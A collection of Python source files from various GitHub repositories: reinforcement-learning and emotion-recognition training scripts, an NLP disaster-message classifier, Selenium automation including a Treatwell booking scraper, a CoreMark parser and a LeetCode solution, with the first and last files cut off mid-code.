print(\"action_dim={}\".format(args.action_dim))\n\n evaluate_num = 0 # Record the number of evaluations\n evaluate_rewards = [] # Record the rewards during the evaluating\n total_steps = 0 # Record the total steps during the training\n device = 0\n replay_buffer = ReplayBufferV2_(args, device)\n agent = HPPO(\n action_dim=env.action_dim,\n state_dim=env.state_dim,\n param_dim=env.param_dim,\n batch_size=args.batch_size,\n mini_batch_size=args.mini_batch_size,\n max_train_steps=args.max_train_steps,\n gamma=args.gamma,\n ac_type=args.distribution_type,\n torch_device=device,\n )\n # reward_scaling = RewardScaling(shape=1, gamma=args.gamma)\n # Build a tensorboard\n # writer = SummaryWriter(log_dir='runs/PPO_discrete/env_{}_number_{}_seed_{}'.format(env_name, number, seed))\n\n state_norm = Normalization(shape=args.state_dim) # Trick 2:state normalization\n\n while total_steps < args.max_train_steps:\n s = env.reset()\n _s = state_norm(s)\n \n episode_steps = 0\n done = False\n # reward_scaling.reset()\n while not done:\n episode_steps += 1\n a, a_logprob, p, p_logprob = agent.choose_action(_s) # Action and the corresponding log probability\n # print(a, p)\n # exit(0)\n # print(p)\n # print(a)\n if agent.ac_type == 'normal' or agent.ac_type == 'stuT':\n param = (p[a*10:a*10+10]+1)/2\n elif agent.ac_type == 'beta' or agent.ac_type=='gamma':\n param = p[a*10:a*10+10]\n elif agent.ac_type == 'F':\n param = (p[a*10:a*10+10]+1)/2\n s_, r, done = env.step(s, (a, param))\n # print(param)\n _s_ = state_norm(s_)\n r_ = r\n # r_ = reward_scaling(r)\n # When dead or win or reaching the max_episode_steps, done will be Ture, we need to distinguish them;\n # dw means dead or win,there is no next state s';\n # but when reaching the max_episode_steps,there is a next state s' actually.\n if done:\n dw = True\n else:\n dw = False\n\n replay_buffer.store(_s, a, a_logprob, p, p_logprob, r_, _s_, dw, done)\n s = s_\n _s = _s_\n total_steps += 1\n # When the number of transitions in buffer reaches batch_size,then update\n if replay_buffer.count == args.batch_size:\n 
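# RunningMeanStd above is an incremental (Welford-style) estimator: each update
# folds one sample into the running mean and the running sum of squared
# deviations S, so the std can be read off at any point. A worked check of
# that recurrence against numpy on a tiny stream:
import numpy as np

samples = [1.0, 2.0, 3.0, 4.0]
n, mean, S = 0, 0.0, 0.0
for x in samples:
    n += 1
    old_mean = mean
    mean = old_mean + (x - old_mean) / n
    S = S + (x - old_mean) * (x - mean)
print(mean, np.sqrt(S / n))  # 2.5 1.118... (population std)
print(np.mean(samples), np.std(samples))  # matches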
agent.update(replay_buffer, total_steps)\n replay_buffer.count = 0\n\n # Evaluate the policy every 'evaluate_freq' steps\n if total_steps % args.batch_size == 0:\n evaluate_num += 1\n evaluate_reward = evaluate_policy(args, env_evaluate, agent, state_norm)\n evaluate_rewards.append(evaluate_reward)\n print(\"evaluate_num:{} \\t evaluate_reward:{} \\t\".format(evaluate_num, evaluate_reward))\n # Save the rewards\n # if evaluate_num % args.save_freq == 0:\n # np.save('./data_train/PPO_discrete_env_{}_number_{}_seed_{}.npy'.format(env_name, number, seed), np.array(evaluate_rewards))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\"Hyperparameter Setting for PPO-discrete\")\n parser.add_argument(\"--max_train_steps\", type=int, default=int(3e6), help=\" Maximum number of training steps\")\n parser.add_argument(\"--evaluate_freq\", type=float, default=9e4, help=\"Evaluate the policy every 'evaluate_freq' steps\")\n parser.add_argument(\"--save_freq\", type=int, default=20, help=\"Save frequency\")\n parser.add_argument(\"--batch_size\", type=int, default=4096, help=\"Batch size\")\n parser.add_argument(\"--mini_batch_size\", type=int, default=128, help=\"Minibatch size\")\n parser.add_argument(\"--hidden_width\", type=int, default=256, help=\"The number of neurons in hidden layers of the neural network\")\n parser.add_argument(\"--lr_a\", type=float, default=1e-5, help=\"Learning rate of actor\")\n parser.add_argument(\"--lr_c\", type=float, default=1e-5, help=\"Learning rate of critic\")\n parser.add_argument(\"--gamma\", type=float, default=0.99, help=\"Discount factor\")\n parser.add_argument(\"--lamda\", type=float, default=0.95, help=\"GAE parameter\")\n parser.add_argument(\"--epsilon\", type=float, default=0.1, help=\"PPO clip parameter\")\n parser.add_argument(\"--K_epochs\", type=int, default=10, help=\"PPO parameter\")\n parser.add_argument(\"--use_adv_norm\", type=bool, default=False, help=\"Trick 1:advantage normalization\")\n parser.add_argument(\"--use_state_norm\", type=bool, default=False, help=\"Trick 2:state normalization\")\n parser.add_argument(\"--use_reward_norm\", type=bool, default=False, help=\"Trick 3:reward normalization\")\n parser.add_argument(\"--use_reward_scaling\", type=bool, default=False, help=\"Trick 4:reward scaling\")\n parser.add_argument(\"--entropy_coef\", type=float, default=0.01, help=\"Trick 5: policy entropy\")\n parser.add_argument(\"--use_lr_decay\", type=bool, default=True, help=\"Trick 6:learning rate Decay\")\n parser.add_argument(\"--use_grad_clip\", type=bool, default=True, help=\"Trick 7: Gradient clip\")\n parser.add_argument(\"--use_orthogonal_init\", type=bool, default=True, help=\"Trick 8: orthogonal initialization\")\n parser.add_argument(\"--set_adam_eps\", type=float, default=True, help=\"Trick 9: set Adam epsilon=1e-5\")\n parser.add_argument(\"--use_tanh\", type=float, default=True, help=\"Trick 10: tanh activation function\")\n parser.add_argument(\"--distribution_type\", type=str, default=\"normal\", help=\"the distribution of ppo continue\")\n args = parser.parse_args() \n main(args, number=1, seed=0)","repo_name":"liuchengyiu/lifecycle_CN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14317854457","text":"import sys\nimport pandas as pd\nfrom sqlalchemy import create_engine\nimport numpy as np\nimport nltk\nnltk.download(['punkt', 'wordnet', 'stopwords'])\nfrom 
nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, make_scorer\nfrom sklearn.decomposition import TruncatedSVD\nimport re\nimport pickle\nimport nltk\nimport warnings\nnltk.download('punkt')\nnltk.download('stopwords')\nwarnings.simplefilter('ignore')\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import classification_report\n\n\ndef load_data(database_filepath):\n \"\"\"\n Load cleaned data from database into dataframe\n Args:\n database_filepath: String. Contains cleaned data table\n table_name: String. Contains cleaned data\n Returns:\n X: numpy.ndarray. Disaster messages\n Y: numpy.ndarray. Disaster categories for each messages\n category_name: list. Disaster category names\n \"\"\"\n # load data from database\n engine = create_engine('sqlite:///' + database_filepath)\n df = pd.read_sql(\"SELECT * FROM MessagesETL\", engine)\n category_names = df.columns[4:]\n X = df['message']\n Y = df.drop(['id', 'message', 'original', 'genre'], axis = 1)\n return X, Y, category_names\n\n\ndef tokenize(text):\n \"\"\"\n Tokenize text (a disaster message).\n Args:\n text: String. A disaster message\n lemmatizer: nltk.stem.Lemmatizer\n Returns:\n tokens: list contains tokens\n \"\"\"\n # Converting everything to lower case\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text.lower())\n \n # Tokenize words\n tokens = word_tokenize(text) \n \n # remove stop words\n tokens = [w for w in tokens if w not in stopwords.words(\"english\")] \n \n # Lemmatize\n lemmatizer = WordNetLemmatizer()\n tokens = [lemmatizer.lemmatize(token) for token in tokens] \n \n return tokens\n\n\ndef build_model():\n \"\"\"\n Build model\n Returns:\n pipline: sklearn.model_selection.GridSearchCV. It contains a sklearn estimator.\n \"\"\"\n # Set pipeline\n new_pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n # Set parameters for gird search\n parameters = {'tfidf__use_idf': (True, False), \n 'clf__estimator__n_estimators': [10, 20], \n 'clf__estimator__min_samples_split': [2, 4]} \n\n # Set grid search\n cv = GridSearchCV(new_pipeline, param_grid=parameters)\n return cv\n\n\ndef evaluate_model(model, X_test, Y_test, category_names):\n \"\"\"\n Evaluate model\n Args:\n model: sklearn.model_selection.GridSearchCV. It contains a sklearn estimator\n X_test: numpy.ndarray. Disaster messages\n Y_test: numpy.ndarray. Disaster categories for each messages\n category_names: Disaster category names\n Returns:\n None\n \"\"\"\n # Predict categories of messages.\n Y_predictionCV_test = model.predict(X_test)\n \n # Print classification report on test data\n for i, col in enumerate(Y_test):\n print(col)\n print(classification_report(Y_test[col], Y_predictionCV_test[:, i]))\n\ndef save_model(model, model_filepath):\n \"\"\"\n Save model\n Args:\n model: sklearn.model_selection.GridSearchCV. It contains a sklearn estimator.\n model_filepath: String. 
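# tokenize() above lower-cases, strips punctuation, tokenizes, removes English
# stopwords, and lemmatizes. The first two stages on a sample message — the
# output of the later stages depends on the downloaded NLTK corpora:
import re
from nltk.tokenize import word_tokenize

text = re.sub(r"[^a-zA-Z0-9]", " ", "Need water and FOOD!".lower())
print(word_tokenize(text))  # ['need', 'water', 'and', 'food']; stopword
# filtering would then drop 'and', and lemmatization normalizes what remains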
Trained model is saved as pickle into this file.\n Returns:\n None\n \"\"\"\n with open(model_filepath, 'wb') as f:\n pickle.dump(model, f)\n\n\ndef main():\n if len(sys.argv) == 3:\n database_filepath, model_filepath = sys.argv[1:]\n print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n X, Y, category_names = load_data(database_filepath)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n \n print('Building model...')\n model = build_model()\n \n print('Training model...')\n model.fit(X_train, Y_train)\n \n print('Evaluating model...')\n evaluate_model(model, X_test, Y_test, category_names)\n\n print('Saving model...\\n MODEL: {}'.format(model_filepath))\n save_model(model, model_filepath)\n\n print('Trained model saved!')\n\n else:\n print('Please provide the filepath of the disaster messages database '\\\n 'as the first argument and the filepath of the pickle file to '\\\n 'save the model to as the second argument. \\n\\nExample: python '\\\n 'train_classifier.py ../data/DisasterResponse.db classifier.pkl')\n\n\nif __name__ == '__main__':\n main()","repo_name":"leotomassetti/Disaster-Response-Pipeline","sub_path":"workspace/models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"10361491272","text":"import sys\n\ndata = sys.stdin.read().split(\"\\n\")\ntotal_ticks = None\niterations = None\n\nfor line in data:\n parts = line.split(\":\", 1)\n if len(parts) == 2:\n key = parts[0].strip()\n value = parts[1].strip()\n if key == \"Total ticks\":\n total_ticks = int(value)\n elif key == \"Iterations\":\n iterations = int(value)\n\nprint(\"{} iterations in {} ticks\".format(iterations, total_ticks))\nprint(\"CoreMark/MHz: {:.2f}\".format(iterations * 1000000 / total_ticks))\n","repo_name":"losfair/Violet","sub_path":"test/parse-coremark-result.py","file_name":"parse-coremark-result.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"53"} {"seq_id":"29899649912","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver import ActionChains\nimport time\n\n\nclass DragAndDrop():\n\n def test(self):\n baseURL = \"https://jqueryui.com/droppable/\"\n driver = webdriver.Firefox()\n driver.maximize_window()\n driver.get(baseURL)\n driver.implicitly_wait(3)\n\n driver.switch_to.frame(0)\n dragElement = driver.find_element(By.ID, \"draggable\")\n dropElement = driver.find_element(By.ID, \"droppable\")\n\n try:\n actions = ActionChains(driver)\n actions.drag_and_drop(dragElement, dropElement).perform()\n print(\"Drag and drop successful\")\n time.sleep(2)\n except:\n print(\"Drag and drop failed\")\n\n driver.quit()\n\n\nff = DragAndDrop()\nff.test()","repo_name":"bartekh21/mighty-python","sub_path":"actions/DragAndDrop.py","file_name":"DragAndDrop.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"27490066339","text":"'''\n\nSuppose an array sorted in ascending order is rotated at some pivot unknown to you beforehand.\n\n(i.e., [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]).\nFind the minimum element.\nThe array may contain duplicates.\n\nExample 1:\nInput: [1,3,5]\nOutput: 1\n\nExample 2:\nInput: [2,2,2,0,1]\nOutput: 0\n\nNote:\nThis is a follow up problem to Find 
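# The CoreMark/MHz figure printed by parse-coremark-result.py above is just
# iterations * 1,000,000 / total_ticks — iterations per million ticks. A worked
# example with made-up numbers:
iterations, total_ticks = 220, 100000000
print("CoreMark/MHz: {:.2f}".format(iterations * 1000000 / total_ticks))  # 2.20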
Minimum in Rotated Sorted Array.\nWould allowing duplicates affect the run-time complexity? How and why?\n\n'''\n\n\n\nclass Solution:\n def findMin(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # method one\n # return min(nums)\n\n\n\n # method two: the hard part of this binary search is that when the boundary and middle elements are equal, we cannot tell which half contains the minimum\n left , right = 0 , len(nums)-1\n while left < right:\n mid = left + (right - left) // 2\n if nums[mid] == nums[right]: # key dedup step: we cannot discard half of the elements at once, only shrink the window one element at a time\n right -= 1\n elif nums[mid] < nums[right]:\n right = mid\n else:\n left = mid + 1\n return nums[left]\n","repo_name":"OnlyChristmas/leetcode","sub_path":"Python/find-minimum-in-rotated-sorted-array-ii.py","file_name":"find-minimum-in-rotated-sorted-array-ii.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} {"seq_id":"31592200556","text":"import json\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport os\n\n\nEMAIL = os.getenv(\"EMAIL\")\nPASSWORD = os.getenv(\"PASSWORD\")\nCHROME_DRIVER_PATH = \"C:\\Work\\Development\\chromedriver.exe\"\n\ntoday_staffs = {}\ntoday_staffs[\"staffs\"] = {}\ntoday_staff = today_staffs[\"staffs\"]\ncounter = 0\n\ndef opening_chrome_window(userUrl):\n\n driver = webdriver.Chrome(executable_path=CHROME_DRIVER_PATH)\n driver.set_window_size(1920,1080)\n driver.get(url=userUrl)\n time.sleep(2)\n return driver\ndef sign_in_to_treatwell():\n email_path = driver.find_element(by=By.XPATH,\n value='//*[@id=\"login-page\"]/div/div[2]/div[1]/form/div[1]/div/div/input')\n password_path = driver.find_element(by=By.XPATH,\n value='//*[@id=\"login-page\"]/div/div[2]/div[1]/form/div[2]/div/div/input')\n email_path.send_keys(EMAIL)\n password_path.send_keys(PASSWORD)\n log_in_btn = driver.find_element(by=By.XPATH, value='//*[@id=\"login-page\"]/div/div[2]/div[1]/form/button')\n log_in_btn.click()\n time.sleep(5)\n\ndef get_date_from_treatwell():\n date = driver.find_element(by=By.XPATH,value='//*[@id=\"calendar-holder\"]/div[2]/div[1]/div[1]/div[3]/div/ul/li[2]/span')\n today_staffs[\"date\"] = date.text\ndef get_all_staffs_name_from_treatwell():\n staff_name_lists = driver.find_elements(by=By.XPATH,value='//*[@id=\"bcalendar-inst\"]/div/div[1]/table/tbody/tr/td')\n for staff in staff_name_lists:\n class_name = staff.get_attribute(\"class\")\n\n if staff.text != ' ':\n if staff.text != '':\n index = int(class_name.split(\" \")[1].split(\"-\")[2])\n split_name_arr = staff.text.split(\"\\n\")\n if(len(split_name_arr)>1):\n staff_name = staff.text.split(\"\\n\")[1]\n today_staff[f\"{index}\"] = {\n \"name\" : staff_name,\n \"bookings\":[]\n }\n else:\n staff_name = staff.text.split(\"\\n\")[0]\n today_staff[f\"{index}\"] = {\n \"name\": staff_name,\n \"bookings\": []\n }\n\ndef saveResultToFile():\n with open(f\"{today_staffs['date']}.json\",\"w\") as data_file:\n json.dump(today_staffs,data_file,indent=4)\n # print(today_staff)\n print(\"Done\")\n# https://connect.treatwell.co.uk/calendar#venue/370180/appointment/day/2022-06-15/199300\n#https://connect.treatwell.co.uk/login?route=%2Fcalendar%23venue%2F370180%2Fappointment%2Fday%2F2022-05-01%2F398937\ndriver = opening_chrome_window(\"https://connect.treatwell.co.uk/calendar#venue/370180/appointment/day/2022-06-29/199300\")\nsign_in_to_treatwell()\nstaff_bookings_lists = driver.find_elements(by=By.XPATH, 
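# A worked trace of "method two" above on the stated example [2,2,2,0,1]. The
# equality branch (nums[mid] == nums[right]) can only shrink the window by one,
# which is why duplicates degrade the worst case from O(log n) toward O(n):
nums = [2, 2, 2, 0, 1]
left, right = 0, len(nums) - 1
while left < right:
    mid = left + (right - left) // 2
    print((left, mid, right))  # (0, 2, 4) then (3, 3, 4)
    if nums[mid] == nums[right]:
        right -= 1
    elif nums[mid] < nums[right]:
        right = mid
    else:
        left = mid + 1
print(nums[left])  # 0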
value='//*[@id=\"bcalendar-inst\"]/div/div[2]/div/table/tbody/tr[2]/td')\nget_date_from_treatwell()\nget_all_staffs_name_from_treatwell()\n\nfor staff_col in staff_bookings_lists:\n bookings = staff_col.find_elements(by=By.CLASS_NAME,value='wc-cal-event')\n if bookings!=[]:\n print(bookings)\n for appointment in bookings:\n if appointment.text != \"\":\n customer_booking_data_list = appointment.text.split(\"\\n\")\n appointment.click()\n time.sleep(2)\n customer_pop_up_treatments_lists = driver.find_elements(by=By.XPATH,value='//*[@id=\"react-root\"]/div/div/div/div[2]/div/div/div[2]/div/div/div[3]/div[1]/div')\n for treatment in customer_pop_up_treatments_lists:\n name = treatment.find_element(by=By.CSS_SELECTOR,value='form > div.appointment--item--content.clearfix > div.js-appointment-data-rows > div > div.appointment--content--item.float.for-max-select.js-employee.right > div > div > div.InputBorder--container--3f2d33 > div > div > div > div')\n if today_staff[f'{counter}'][\"name\"] in name.text:\n customer_booking_dict = {}\n customer_name_obj = treatment.find_element(by=By.XPATH,value='//*[@id=\"react-root\"]/div/div/div/div[2]/div/div/div[1]')\n start_time_obj = treatment.find_element(by=By.CSS_SELECTOR,value='form > div.appointment--item--content.clearfix > div.js-appointment-data-rows > div > div.appointment--content--item.float.for-small-select.no-label.js-startTime.is-react > div > div.InputBorder--container--3f2d33 > div > div > div > div')\n end_time_obj = treatment.find_element(by=By.CSS_SELECTOR,value='form > div.appointment--item--content.clearfix > div.js-appointment-data-rows > div > div.appointment--content--item.clear.extra-padding > span > span')\n customer_booking_dict[\"time\"] = f\"{start_time_obj.text} - {end_time_obj.text}\"\n treatment_type = treatment.find_element(by=By.CSS_SELECTOR,value='form > div.appointment--item--content.clearfix > div.appointment--content--item')\n price = treatment.find_element(by=By.CSS_SELECTOR,value='form > div.appointment--item--footer.clearfix > span > span')\n personOrTreatwellBook = treatment.find_element(by=By.CSS_SELECTOR,value='div > div > div.content-scroll > div.js-appointments.udv-appointments > div > form > div.appointment--source')\n paidOrUnpaid = treatment.find_element(by=By.CSS_SELECTOR,value='form > div.appointment--item--footer.clearfix > span')\n # react-root > div > div > div > div.ui-dialog.dialog2.react-dialog.calendar-item-editor.top > div > div > div:nth-child(3) > div > div > div.content-scroll > div.js-appointments.udv-appointments > div > form > div.appointment--item--footer.clearfix > span\n # react-root > div > div > div > div.ui-dialog.dialog2.react-dialog.calendar-item-editor.top > div > div > div:nth-child(3) > div > div > div.content-scroll > div.js-appointments.udv-appointments > div:nth-child(2) > form > div.appointment--item--footer.clearfix > span\n note_container = treatment.find_element(by=By.CSS_SELECTOR, value='form > div.js-notes.textarea-container')\n customer_booking_dict[\"note\"] = note_container.text\n customer_booking_dict[\"price\"] = price.text.strip(\"£\")\n customer_booking_dict[\"treatment\"] = treatment_type.text.split(\"\\n\")[0]\n customer_booking_dict[\"personOrTreatwellBook\"] = personOrTreatwellBook.text\n customer_booking_dict[\"paidOrUnpaid\"] = paidOrUnpaid.text.replace(\"£\",'')\n try:\n duration_obj = treatment.find_element(by=By.CSS_SELECTOR,value='form > div.appointment--item--content.clearfix > div.appointment--content--item > div.js-skuId.extra-top-margin.is-react > 
div')\n customer_booking_dict[\"duration\"] = duration_obj.text\n except:\n customer_booking_dict[\"duration\"] = \"Invalid\"\n if customer_booking_dict not in today_staff[f'{counter}']['bookings']:\n today_staff[f'{counter}']['bookings'].append(customer_booking_dict)\n print(f'This is {name.text}')\n close_pop_up_btn = driver.find_element(by=By.XPATH,value='//*[@id=\"react-root\"]/div/div/div/div[2]/div/div/span')\n close_pop_up_btn.click()\n print(today_staff)\n time.sleep(2)\n\n\n counter+=1\n\n#react-root > div > div > div > div.ui-dialog.dialog2.react-dialog.calendar-item-editor.top > div > div > div:nth-child(3) > div > div > div.content-scroll > div.js-appointments.udv-appointments > div > form > div.appointment--source\n#react-root > div > div > div > div.ui-dialog.dialog2.react-dialog.calendar-item-editor.top > div > div > div:nth-child(3) > div > div > div.content-scroll > div.js-appointments.udv-appointments > div > form > div.appointment--source\nsaveResultToFile()\n\n# driver.close()","repo_name":"supawichza40/TreatwellDailySummary","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36698307489","text":"import warnings\nwarnings.filterwarnings(\"ignore\")\n#from apex import amp\nimport numpy as np\nimport torch.utils.data as data\nfrom torchvision import transforms\nimport os, torch\nimport argparse\nfrom dataset_leave_one_out import *\n\nfrom tqdm import trange\nimport wandb\nfrom sklearn.preprocessing import MinMaxScaler\nfrom Networks import * \nimport Networks\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n '''ARM'''\n parser.add_argument('--dataset_path', type=str, default='../datasets/', help='Root dataset path.')\n parser.add_argument('--data_type', type=str, default='GEMEP', help='rafdb or affectnet or ferplus or new_test(the new data you want to test)')\n parser.add_argument('--new_test_path', type=str, default=None, help='New test dataset path.')\n parser.add_argument('--phase', type=str, default='test', help='The phase you want to choose.(default:test or new_test)')\n parser.add_argument('--checkpoint_face', type=str, default='../models/GEMEP_FACE/split1_epoch1_acc0.9139.pth', help='Pytorch checkpoint file path')\n parser.add_argument('-b', '--batch_size', type=int, default=64, help='Batch size.')\n parser.add_argument('--workers', default=1, type=int, help='Number of data loading workers (default: 4)')\n parser.add_argument('-p', '--plot_cm', action='store_true', help='Ploting confusion matrix.')\n parser.add_argument('--mtcnn', action='store_true', help='Using MTCNN to align image.')\n parser.add_argument('--mt_img_path', type=str, default=None, help='Path of the dataset you want to align.')\n parser.add_argument('--mt_save_path', type=str, default=None, help='Path you want to save your dataset.')\n parser.add_argument('--video', action=\"store_true\", help=\"Using MTCNN to align image.\")\n parser.add_argument('--video_path', type=str, default='../datasets/video/', help='Video data path.')\n \n '''Fusing Body'''\n parser.add_argument('--checkpoint_body', type=str, default='../models/GEMEP_BODY/split4_ep59_acc77.27.pth', help='Pytorch checkpoint file path')\n parser.add_argument('--first_layer_size', default=256, type=int)\n parser.add_argument('--num_classes', type=int, default=7)\n parser.add_argument('--confidence_threshold', type=float, default=0.1)\n parser.add_argument('--body_pooling', default=\"avg\", 
help=\"how to aggregate the body features sequence\")\n parser.add_argument('--db', default=\"babyrobot\")\n\n parser.add_argument('--epochs', type=int, default=200, help='Total training epochs.')\n parser.add_argument('--lr', type=float, default=0.001, help='Initial learning rate for sgd.')\n parser.add_argument('--mode', type=str, default=\"train\")\n\n return parser.parse_args()\n\n\ndef test():\n path_face = '../models/GEMEP_FACE_7/'\n path_body = '../models/GEMEP_BODY_7/'\n path_fc = '../models/GEMEP_FC_7/'\n \n for n in range(1, 11):\n n = 2\n #----------------------Face Model----------------------#\n face_checkpoints = [name for name in os.listdir(path_face)]\n for i, face_checkpoint in enumerate(face_checkpoints):\n if n == int(face_checkpoint.split('_')[0][5:]):\n path_face_checkpoint = os.path.join(path_face,face_checkpoint)\n print(\"Loading face pretrained weights...\", path_face_checkpoint)\n face_model = Networks.ResNet18_ARM___RAF(num_classes=args.num_classes)\n checkpoint_face = torch.load(path_face_checkpoint)\n face_model.load_state_dict(checkpoint_face[\"model_state_dict\"], strict=False)\n face_model = face_model.cuda()\n\n #----------------------Body Model----------------------#\n body_checkpoints = [name for name in os.listdir(path_body)]\n for i, body_checkpoint in enumerate(body_checkpoints):\n if n == int(body_checkpoint.split('_')[0][5:]):\n path_body_checkpoint = os.path.join(path_body,body_checkpoint)\n print(\"Loading body pretrained weights...\", path_body_checkpoint) \n body_model = Networks.BodyFaceEmotionClassifier(args).cuda()\n checkpoint_body = torch.load(path_body_checkpoint)\n body_model.load_state_dict(checkpoint_body[\"model_state_dict\"], strict=False)\n body_model = body_model.cuda()\n\n #----------------------FC Layer----------------------#\n if args.mode == 'train':\n fc_model = Networks.FcLayer(args).cuda()\n fc_model = fc_model.cuda()\n\n # elif args.mode == 'test':\n fc_checkpoints = [name for name in os.listdir(path_fc)]\n for i, fc_checkpoint in enumerate(fc_checkpoints):\n if n == int(fc_checkpoint.split('_')[0][5:]):\n path_fc_checkpoint = os.path.join(path_fc, fc_checkpoint)\n print(\"Loading body pretrained weights...\", path_fc_checkpoint)\n fc_model = Networks.FcLayer(args).cuda()\n checkpoint_fc = torch.load(path_fc_checkpoint)\n fc_model.load_state_dict(checkpoint_fc[\"model_state_dict\"], strict=False)\n fc_model = fc_model.cuda()\n\n CE_criterion = torch.nn.CrossEntropyLoss().cuda()\n optimizer = torch.optim.Adam(params = fc_model.parameters(), weight_decay=1e-2, lr=args.lr)\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=30, gamma=0.8)\n\n #----------------------Face Data----------------------#\n # data_type()\n data_transforms = transforms.Compose([transforms.ToPILImage(),\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.558, 0.437, 0.384], std=[0.277, 0.247, 0.241]),\n transforms.RandomErasing(scale=(0.02, 0.1))])\n face_train_dataset = Dataset(args.dataset_path, args.data_type, phase='train', transform=data_transforms, basic_aug=True, data = None, performer_number = n)\n face_train_size = face_train_dataset.__len__()\n print('Face testing size: ', face_train_size, '\\n')\n\n face_train_loader = torch.utils.data.DataLoader(face_train_dataset, batch_size=args.batch_size, num_workers=args.workers, shuffle=False, pin_memory=True)\n\n\n data_transforms_test = transforms.Compose([transforms.ToPILImage(),\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n 
transforms.Normalize(mean=[0.558, 0.437, 0.384], std=[0.277, 0.247, 0.241])])\n\n face_test_dataset = Dataset(args.dataset_path, args.data_type, phase='val', transform=data_transforms_test, data = None, performer_number=n)\n face_test_size = face_test_dataset.__len__()\n print('Face testing size: ', face_test_size, '\\n')\n\n face_test_loader = torch.utils.data.DataLoader(face_test_dataset,\n batch_size=args.batch_size,\n num_workers=args.workers,\n shuffle=False,\n pin_memory=True)\n\n #----------------------Body Data----------------------#\n body_test_dataset = BodyFaceDataset(args=args, subjects=list(range(0,31)), phase=\"test\", number = n)\n scaler = get_scaler(body_test_dataset)#find the min and max value that will be used later to scale\n body_test_dataset.set_scaler(scaler)#actually scaled the whole data\n body_test_dataset.to_tensors()\n body_test_dataset.prepad()\n body_test_size = body_test_dataset.__len__()\n body_test_loader = torch.utils.data.DataLoader(body_test_dataset, \n batch_size=body_test_size, \n num_workers=args.workers,\n shuffle=False, \n pin_memory=True)\n\n body_train_dataset = BodyFaceDataset(args=args, subjects=list(range(0,31)), phase=\"train\", number = n)\n body_train_dataset.set_scaler(scaler)#actually scaled the whole data\n body_train_dataset.to_tensors()\n body_train_dataset.prepad()\n body_train_size = body_train_dataset.__len__()\n body_train_loader = torch.utils.data.DataLoader(body_train_dataset, \n shuffle=False, \n batch_size=body_train_size, \n drop_last=True, \n num_workers=args.workers)\n print('Body training size: ', body_train_size, '\\n')\n print('Body testing size: ', body_test_size, '\\n')\n\n '''Start Testing'''\n print('Start Testing...\\n')\n \n\n train(fc_model, CE_criterion, optimizer, body_train_size, face_model, body_model, face_train_loader, face_train_dataset, body_train_loader, body_test_size, face_test_loader, face_test_dataset, body_test_loader, n, scheduler)\n\n\n\ndef train(fc_model, CE_criterion, optimizer, body_train_size, face_model, body_model, face_train_loader, face_train_dataset, body_train_loader, body_test_size, face_test_loader, face_test_dataset, body_test_loader, n, scheduler):\n if args.mode == 'train':\n fc_model.train()\n storage_face, storage_body, all_label = concate(body_train_size, face_model, body_model, face_train_loader, face_train_dataset, body_train_loader)\n concate_data = torch.cat((torch.from_numpy(storage_face), torch.from_numpy(storage_body)), 1).float().cuda()\n concate_data_val, all_label_val = 0, 0\n\n for current_epoch in trange(1, args.epochs + 1): \n if args.mode == 'train':\n concate_output = fc_model(concate_data)\n \n loss = CE_criterion(concate_output, all_label.long())\n loss.backward()\n optimizer.step()\n \n _, predicts = torch.max(concate_output, 1)\n correct_count_fc = torch.eq(predicts, all_label.cuda())\n correct_num = correct_count_fc.sum()\n train_acc = correct_num.float()/float(len(all_label))\n print('Train loss = ', loss.item())\n print('Train ACC = ', train_acc.item())\n\n\n val_acc, concate_data_val, all_label_val = validate(fc_model, CE_criterion, body_test_size, face_model, body_model, face_test_loader, face_test_dataset, body_test_loader, current_epoch, n, concate_data_val, all_label_val)\n print('[Split: %02d/%02d]\\n\\n'%(n, 10))\n scheduler.step()\n\n\ndef validate(fc_model, CE_criterion, body_test_size, face_model, body_model, face_test_loader, face_test_dataset, body_test_loader, current_epoch, performer_number, concate_data, all_label):\n fc_model.eval()\n if 
